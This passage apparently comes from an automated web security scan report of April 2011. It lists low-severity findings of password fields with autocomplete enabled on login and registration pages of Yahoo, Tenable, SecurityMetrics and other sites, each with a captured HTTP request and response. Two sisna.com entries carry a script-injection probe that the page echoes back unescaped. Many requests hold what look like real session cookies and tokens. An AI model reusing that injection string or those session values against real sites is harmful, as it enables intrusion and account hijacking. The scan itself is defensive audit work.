Date: Tue, 26 Apr 2011 01:06:00 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<td valign="top" class="element-row1">
                   <form method="POST" action="/?page=login&cmd=start_reg" name="register_form" id="geoform" language="JavaScript">
                   <fieldset>
...[SNIP]...
<div class="field"><input maxLength="12" name="password" size="20" type="password"></div>
...[SNIP]...
<div class="field"><input maxLength="12" name="password1" size="20" type="password"></div>
...[SNIP]...

16.3. http://afreshbunch.com/forums/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /forums/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /forums/?page=t&sa=mine HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.9.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 16260
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:04:52 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:05:52 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<div class="element-inner-div">


<form method="POST" name="login_form" action="/?page=login&cmd=passme">


<p>
...[SNIP]...
<td width="65%" nowrap class="element-row1-inner">
    <input TYPE="password" NAME="password" size="30"></td>
...[SNIP]...

16.4. https://edit.yahoo.com/registration  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /registration

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /registration?.done=http://downloads.yahoo.com%2findex.php&.src=ydl&.intl=us HTTP/1.1
Host: edit.yahoo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; ysf=8rcxbXg95hel0MytgTDr_2B2BVW0jVQ7tmPJEs0j5AdXZUbybwmQZsK068tjIvf6fYYxCmH8sgZKRD4nnaFbjRWnNh0tzBZZPI2TlrRCtwN9ysEBdYbFFQazweu3F.kqY7kl94s5Eq0mFfPFH2RWxS14zsQgGNEiePX.qwRuZSNYyhi7khtbCFI_IZp1LMsy.3gF5Dxxjeow9Zm6fusz3hOtSDsrsaDHGtyrL2wQxmLtoE4J7ppVLywJKGUp10gymzlZvt3Bo.2oy9nEuAfWDpwmnabn81GNWisNd11D_e6WMQs2naRzFa8WRHeyvGOQCFHb0wWqVdFG3Vxq9Heb_LiLJRAPFTAGEtpHyk7jX.8lnein3dyeJIbqpiXqw3HvQ3OE8Za3L6TkP49RDB4lIF2cj1T2LGB2M.ZV450VG0Ck7IqiOovO94EXpPikk207OLESF0yStMJphO8GChEL3kZP

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:56:40 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 52925


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">    
   <t
...[SNIP]...
<!-- begin: form -->
<form id="regFormBody" name="regFormBody" action="/registration" method="post">

<input type="hidden" id="parentreg" name=".parentreg" value="">
...[SNIP]...
<div class="collection">
<input type="password" name="password" id="password" value="" size="32" maxlength="32" class="">
<div id="meter_tag">
...[SNIP]...
<div class="collection">
<input type="password" name="passwordconfirm" id="passwordconfirm" value="" size="32" maxlength="32" class="">
</div>
...[SNIP]...

16.5. http://learn.bridgefront.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:40 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=F135E1A487FF7E17C2D48B02FB00CAEA; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34161


<html>
<head>

<title>BridgeFront | LMS | Login</title>
<link href="/lscheme/default/css/Learner.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/js/LearnerSideJsFun
...[SNIP]...
<td style="height: 134px">
<form name="loginform" id="loginform" method="post" action="/logincontroller" onsubmit="return specialValidation()">
                <input type="hidden" name="forwardpage" id="forwardpage" value="lm_login.jsp">
...[SNIP]...
<td width="35%"><input name="replace1_ul_" id="replace1_ul_" type="password" class="TxtField" style="width: 204px" maxlength="50"></td>
...[SNIP]...

16.6. http://learn.bridgefront.com/login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /login.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.jsp?reason=keyfailed HTTP/1.1
Referer: http://learn.bridgefront.com/KeyRegister
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.bridgefront.com
Cookie: JSESSIONID=1B3FB576C860FF50C5478C31E0BD27CE
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:35:22 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34227


<html>
<head>

<title>BridgeFront | LMS | Login</title>
<link href="/lscheme/default/css/Learner.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/js/LearnerSideJsFun
...[SNIP]...
<td style="height: 134px">
<form name="loginform" id="loginform" method="post" action="/logincontroller" onsubmit="return specialValidation()">
                <input type="hidden" name="forwardpage" id="forwardpage" value="lm_login.jsp">
...[SNIP]...
<td width="35%"><input name="replace1_ul_" id="replace1_ul_" type="password" class="TxtField" style="width: 204px" maxlength="50"></td>
...[SNIP]...

16.7. http://login.sisna.com/login_multiple/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.sisna.com
Path:   /login_multiple/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login_multiple/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3E HTTP/1.1
Host: login.sisna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:57:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 2028
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- Login Form -->
<form action="/login_multiple/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3E" method="post" name="login">
<table id="login" class="tbl_login" align="center">
...[SNIP]...
<td><input name="usernamepword" type="password" class="txt"></td>
...[SNIP]...

16.8. http://login.sisna.com/login_multiple/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.sisna.com
Path:   /login_multiple/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2 HTTP/1.1
Host: login.sisna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:44:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 2742
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- Login Form -->
<form action="/login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2" method="post" name="login">
<table id="login" class="tbl_login" align="center">
...[SNIP]...
<td><input name="usernamepword" type="password" class="txt"></td>
...[SNIP]...

16.9. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /config/login?.done=http://downloads.yahoo.com%2findex.php&.src=ydl&.intl=us HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; ysf=08QxMuCE5xcRp6XxvP9UqQQVFjUnPTRIkxcDabYECLHYlgjWjedO.aMI9RGj2l09q.GrzSj0ZGNpKWL4tC5RhhHyRxFHPlU.kFCMEd44rNZiy50Es8NrBu7yXU0mNtf0YtrWeEjpo31kxbqrG0YGBvIbxraTXVC9nbjUpNtv9aXJppMZot2l11h5_ZSFAPhtqxX_6SVAEVGb0NKTjuEX9ZYv2zDAxiWP9cGTqFS0cy9sv336lSqBJx7SukerpgGajbVm5ixswV527gxjaF3uyCr7m1vg_4ERgH_kHGmM1GC3lZg7kpdA4se.Qgpe8f7RJkYS8crdx364dtmP6Js16W8_gxE1rMXJs1u9F8J4fm3eQRNc_54_vpkaiaTqfiqOcFZODhj_ghb_GOxG1FWZmW.i2zsaspuKA4yive5ZswfNSY0PlT8WhNaRhUIxTsKui8a4VYdjdz.5HLTMtIko4yhA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:55:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 42663


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</legend>


<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="" name="login_form" onsubmit="return hash2(this)">

<input type="hidden" name=".tries" value="1">
...[SNIP]...
</label>
<input name='passwd' id='passwd' type='password' maxlength='64' tabindex='2'>


</div>
...[SNIP]...

16.10. https://securitymetrics.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA

Response

HTTP/1.1 200 OK
MIME-Version: 1.0
Date: Tue, 26 Apr 2011 00:52:33 GMT
Server: AOLserver/4.5.1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 10502

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="Keywords" http-
...[SNIP]...
<div id="signin" class="signin">
<form action="/login.adp" method=post name=f>

<p>
...[SNIP]...
<br>
Password
<input name="password" type="password" size="25" class="textinput" id="login_password">
<br/>
...[SNIP]...

16.11. https://securitymetrics.com/login.adp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /login.adp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.adp?login_type=customer&next_page=back HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
MIME-Version: 1.0
Date: Tue, 26 Apr 2011 01:09:24 GMT
Server: AOLserver/4.5.1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 6067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<TITLE>Customer Login - SecurityMetrics</TIT
...[SNIP]...
<br/>

<form method="post" action="login.adp">
<input type="hidden" name="login_action" value="login">
...[SNIP]...
<td><input type="password" size="35" id="main_password" name="password" tabindex=2></td>
...[SNIP]...

16.12. https://securitymetrics.com/login.adp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /login.adp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.adp?login_type=customer&next_page=back HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
MIME-Version: 1.0
Date: Tue, 26 Apr 2011 01:09:24 GMT
Server: AOLserver/4.5.1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 6067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<TITLE>Customer Login - SecurityMetrics</TIT
...[SNIP]...
<div class="signin">
<form action="/login.adp?login_type=customer" method="post" name="signin_form" style="margin: 0px; padding: 0px;">
<nobr>
...[SNIP]...
<nobr>Password
<input name="password" type="password" size=25 class="textinput" id="topright_password">
</nobr>
...[SNIP]...

16.13. https://securitymetrics.com/register_home.adp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /register_home.adp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /register_home.adp?action=new HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/determinesaq/storechd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
MIME-Version: 1.0
Date: Tue, 26 Apr 2011 01:09:24 GMT
Server: AOLserver/4.5.1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 50207


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<TITLE>Registration - SecurityMetrics</TITLE>

...[SNIP]...
<div class="signin">
<form action="/login.adp?login_type=customer" method="post" name="signin_form" style="margin: 0px; padding: 0px;">
<nobr>
...[SNIP]...
<nobr>Password
<input name="password" type="password" size=25 class="textinput" id="topright_password">
</nobr>
...[SNIP]...

16.14. https://store.tenable.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.php?main_page=login&zenid=5717419e1ab4b29ffbd339c41541e7c7 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=shopping_cart&zenid=5717419e1ab4b29ffbd339c41541e7c7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:59:31 GMT
Server: Apache
Set-Cookie: zenid=5717419e1ab4b29ffbd339c41541e7c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 45368

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>Login : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
</div>

<form name="login" action="https://store.tenable.com/index.php?main_page=login&amp;action=process&amp;zenid=5717419e1ab4b29ffbd339c41541e7c7" method="post" id="loginForm"><label class="inputLabel" for="login-email-address">
...[SNIP]...
</label>
<input type="password" name="password" id="login-password" /><input type="hidden" name="securityToken" value="e36216e6eab1dc4aeeb9e9fc6b86380c" />
...[SNIP]...

16.15. https://store.tenable.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

POST /index.php?main_page=create_account&zenid=5717419e1ab4b29ffbd339c41541e7c7 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=login&zenid=5717419e1ab4b29ffbd339c41541e7c7
Cache-Control: max-age=0
Origin: https://store.tenable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:00:09 GMT
Server: Apache
Set-Cookie: zenid=5717419e1ab4b29ffbd339c41541e7c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 59499

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>Create an Account : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...
</h1>
<form name="create_account" action="https://store.tenable.com/index.php?main_page=create_account&amp;zenid=5717419e1ab4b29ffbd339c41541e7c7" method="post" onsubmit="return check_form(create_account);"><input type="hidden" name="action" value="process" />
...[SNIP]...
</label>
<input type="password" name="password" size = "21" maxlength= "40" id="password-new" /><br class="clearBoth" />
...[SNIP]...
</label>
<input type="password" name="confirmation" size = "21" maxlength= "40" id="password-confirm" /><br class="clearBoth" />
...[SNIP]...

16.16. https://support.sentrigo.com/User/Login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.sentrigo.com
Path:   /User/Login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /User/Login HTTP/1.1
Host: support.sentrigo.com
Connection: keep-alive
Referer: https://support.sentrigo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSd27384b3a2299db58d67110ef35da57a=kg3uc9rp83bgra0g4d9ddtn3i3; __utmz=75719754.1303780499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:172-VIM-170&token:_mch-sentrigo.com-1303780496241-25669; PHPSESSID=esjikd3cpu81nqjvdhe9ecrli0; __utma=75719754.1100420185.1303780499.1303780499.1303780499.1; __utmc=75719754; __utmb=75719754.4.10.1303780499

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:27:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3052
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script language="JavaScri
...[SNIP]...
<div class="box_br">

                   <form name="frm_login" id="frm_login" action="/User/ProcessLogin" method="post">
                       <fieldset>
...[SNIP]...
</span>
                               <input type="password" name="pw" id="password" maxlength="120" />
                           </label>
...[SNIP]...

16.17. https://support.tenable.com/support-center/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.tenable.com
Path:   /support-center/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /support-center/ HTTP/1.1
Host: support.tenable.com
Connection: keep-alive
